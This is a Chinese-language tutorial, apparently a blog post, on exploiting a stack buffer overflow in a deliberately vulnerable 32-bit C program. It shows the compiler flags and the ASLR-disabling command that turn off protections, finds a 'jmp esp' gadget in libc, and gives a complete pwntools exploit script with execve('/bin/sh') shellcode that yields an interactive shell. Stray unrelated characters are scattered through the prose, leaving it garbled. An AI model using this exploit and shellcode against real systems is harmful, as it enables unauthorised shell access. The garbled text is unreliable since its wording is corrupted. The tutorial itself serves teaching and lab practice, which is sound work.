一蜗巧,工具安裝
pwntools工具安裝
$ sudo apt-get update
$ sudo apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
$ sudo pip install --upgrade pip
$ sudo pip install --upgrade pwntools
gcc/gdb安裝
$ sudo apt-get install gcc/gdb
peda安裝
$ git clone https://github.com/longld/peda.git ~/peda
$ echo "source ~/peda/peda.py" >> ~/.gdbinit
二幕屹,程序
源碼文件名為:StackOF.c
#include <stdio.h>
#include <string.h>
void vul(char *msg)
{
char buffer[64];
strcpy(buffer,msg);
return;
}
int main()
{
puts("So plz give me your shellcode:");
char buffer[256];
memset(buffer,0,256);
read(0,buffer,256);
vul(buffer);
return 0;
}
可以看到,其是將main函數(shù)里的buffer作為msg傳入vul函數(shù)里迅腔,然后拷貝到vul中的buffer,但是main函數(shù)中buffer大小為256,而vul函數(shù)中buffer的大小為64,這就是問題所在靠娱。
為了調(diào)試方便把保護(hù)操作關(guān)閉
gcc編譯:gcc -m32 -no-pie -fno-stack-protector -z execstack -o pwnme StackOF.c
-m32:生成32位的可執(zhí)行文件
-no-pie:關(guān)閉程序ASLR/PIE(程序隨機(jī)化保護(hù))
-fno-stack-protector:關(guān)閉Stack Protector/Canary(棧保護(hù))
-z execstack:關(guān)閉DEP/NX(堆棧不可執(zhí)行)
-o:輸出
pwnme:編譯生成文件的文件名
StackOF.c:編譯前的源文件
嘗試運(yùn)行pwnme
觀察分析所開啟的漏洞緩解策略
最好加一條命令關(guān)閉系統(tǒng)的的地址隨機(jī)化
echo 0 > /proc/sys/kernel/randomize_va_space
三沧烈,思路
由源碼可知該棧溢出漏洞的原因是在調(diào)用strcpy之前未對(duì)源字符串的長(zhǎng)度進(jìn)行安全檢查。結(jié)果就是用戶輸入過長(zhǎng)時(shí)像云,會(huì)向高地址覆蓋锌雀。
那我們可以布局成
假設(shè)jmp esp的地址為0x12345678迅诬,在運(yùn)行到原返回地址位置也就是0x12345678時(shí)腋逆,會(huì)執(zhí)行0x12345678處的指令,也就是jmp esp,同時(shí)esp會(huì)+4,這時(shí)esp就指向了shellcode的起始位置侈贷,jmp esp一執(zhí)行惩歉,接下來就是執(zhí)行shellcode,如圖:
所以要構(gòu)造的
buffer = 填充字符 + jmp_esp +shellcode
四,具體解決分析
jmp esp咋整呢俏蛮?這個(gè)我們可以去libc文件中查找(libc是個(gè)啥撑蚌?),c編寫的程序都要加載libc文件.
1.libc怎么找搏屑?
首先争涌,我們先查看加載的libc文件是什么版本
打開gdb調(diào)試pwnme
直接在main函數(shù)上下斷點(diǎn)
然后r運(yùn)行,加載程序辣恋,在斷點(diǎn)斷下
輸入 info sharedlibrary或i sharedlibrary
這個(gè)時(shí)候你就找到了(- _-)!!!
2.找到jmp esp在libc中的地址:jmp_esp_addr_offset
很簡(jiǎn)單亮垫,上代碼
from pwn import *
libc = ELF('/lib32/libc.so.6') #文件
jmp_esp = asm('jmp esp') #jmp esp匯編指令的操作數(shù)
jmp_esp_addr_in_libc = libc.search(jmp_esp).next() #搜索
print hex(jmp_esp_addr_in_libc) #打印
效果
但但但但是!N肮恰R省!這還沒完底靠,這個(gè)地址只是jmp esp在libc文件里的位置(也叫偏移地址害晦,在最終代碼將命名為jmp_esp_addr_offset),要知道其在程序里的地址還要加上libc在程序里的起始地址(也叫基址暑中,在最終代碼將命名為libc_base),所以jmp esp在程序里的地址 : jmp_esp_addr = jmp_esp_addr_offset+libc_base,結(jié)合圖解一下
3壹瘟,找libc在程序里的地址:libc_base
輸入指令LD_TRACE_LOADED_OBJECTS=1 ./pwnme可以得到加載位置
4.編寫shellcode
通過調(diào)用系統(tǒng)調(diào)用獲得shell
\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80
五,最終代碼
from pwn import *
p = process('./pwnme') #運(yùn)行程序
p.recvuntil("shellcode:") #當(dāng)接受到字符串'shellcode:'
#找jmp_esp_addr_offset,見本文第四節(jié)第二點(diǎn)
libc = ELF('/lib32/libc.so.6')
jmp_esp = asm('jmp esp')
jmp_esp_addr_offset = libc.search(jmp_esp).next()
if jmp_esp_addr_offset is None:
print 'Cannot find jmp_esp in libc'
else:
print hex(jmp_esp_addr_offset)
libc_base = 0xf7dd1000 #你找到的libc加載地址
jmp_esp_addr = libc_base + jmp_esp_addr_offset #得到j(luò)mp_esp_addr
print hex(jmp_esp_addr)
#構(gòu)造布局,本文第三節(jié)
buf = 'A'*76 #如何得到填充數(shù)據(jù)大婿狻:http://www.reibang.com/p/278f8d1f8322
buf += p32(jmp_esp_addr)
buf += '\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'
with open('poc','wb') as f:
f.write(buf)
p.sendline(buf) #發(fā)送構(gòu)造后的buf
p.interactive()
六稻轨,效果
輸入
whoami測(cè)試一下
發(fā)現(xiàn)為
root用戶,已經(jīng)可以產(chǎn)生交互雕凹。附上相關(guān)文章一篇:http://www.mamicode.com/info-detail-2232012.htm
